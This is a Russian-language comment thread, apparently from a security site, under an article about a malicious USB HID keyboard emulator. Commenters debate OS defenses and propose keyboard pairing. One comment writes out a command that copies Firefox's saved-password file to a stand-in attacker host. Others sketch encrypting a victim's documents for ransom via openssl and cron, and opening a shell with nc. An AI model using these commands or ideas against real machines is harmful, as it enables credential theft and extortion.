merced2001 Oct 4 2012 at 16:35

Evil USB HID-эмулятор или просто Peensy

5 min

37K

Information Security*

From sandbox

+26

Comments 14

vvzvlad Oct 4 2012 at 16:54

Лучше бы не блокнот показали, а выполнение скрипта.

merced2001 Oct 4 2012 at 17:09

там особо и нечего то смотреть. висит микроокно cmd несколько секунд. потом пропадает…

vvzvlad Oct 4 2012 at 17:23

Результат. Антивирус убить, или еще что-нибудь.

amarao Oct 4 2012 at 21:08

С ужасом представляю себе, как эта штука запускается под приличной ОС. Ни cmd.exe, ни павершелла. Судо требует либо пальчик на фингерпринт-ридере, либо пароль…

l0cal Oct 4 2012 at 21:15

UAC тоже может спросить пароль

UrbanRider Oct 4 2012 at 22:07

Microsoft Way: 2 Пользователя. 1 — Админ, 2- Обычный юзер.
Работаем под 2, при необходимости повышения привелегий вводим лог анд пасс от 1. Необходимое приложение запустится от пользователя 1.

lirvux Oct 4 2012 at 22:19

Вот только следуют этому простому правилу очень мало пользователей… «Зачем лишняя суета, какие то пароли. Все равно компьютером только я и близкие друзья пользуются»

Self_Perfection Oct 4 2012 at 23:19

Alt+F2
xterm
scp .mozilla/firefox/*/signons.sqlite bad.guy@somewhere:

amarao Oct 4 2012 at 23:27

А в ответ он пальчик просит для ключа… Вот незадача.

Self_Perfection Oct 4 2012 at 23:30

На что именно? scp? Ок, по ftp.

amarao Oct 4 2012 at 23:34

А вот это да, проблема. За вычетом того, что у меня на машине xterm'а нет, а так да, проблема.

А, вспомнил. Кейринг-то, в т.ч. и у iceweasel, тоже зашифрован. Так что нет. Хотя документы упереть, да, можно. И шелл запустить из чего-то типа nc в режиме listen тоже можно.

Self_Perfection Oct 4 2012 at 23:49

А можно ещё документы зашифровать каким-нибудь openssl и после
xdg-open badguy/hello
Где будет написано «заплатите мне 1000$, чтоб я вам выслал ключ дешифровки»

И можно даже не сразу это сделать, а поставить задачу в крон.

USB HID реально большая дыра, даже на правильных ОС.

В идеале должен быть pairing. ОС при обнаружении новой клавы показывает окошко с последовательностью символов, которую нужно нажать, чтоб клава считалась доверенной.

amarao Oct 4 2012 at 23:57

Ну вот этим современного человека не устрашить. Я сейчас прикинул — если я лишусь ~ на ноуте, то там будет ошмёток презентации, сейв от игрушки, столь любимые конфиги к софту — … и всё. Всё остальное на серверах. Либо СЭД, либо гиты, либо прочие корпоративные системы.

ЗЫ А параноикам нужно просто разрешить HID'ы в X-сервере по списку, а не все подряд.

zorgrhrd Oct 5 2012 at 09:02

для повышения привилегий в windows тоже требуется пароль.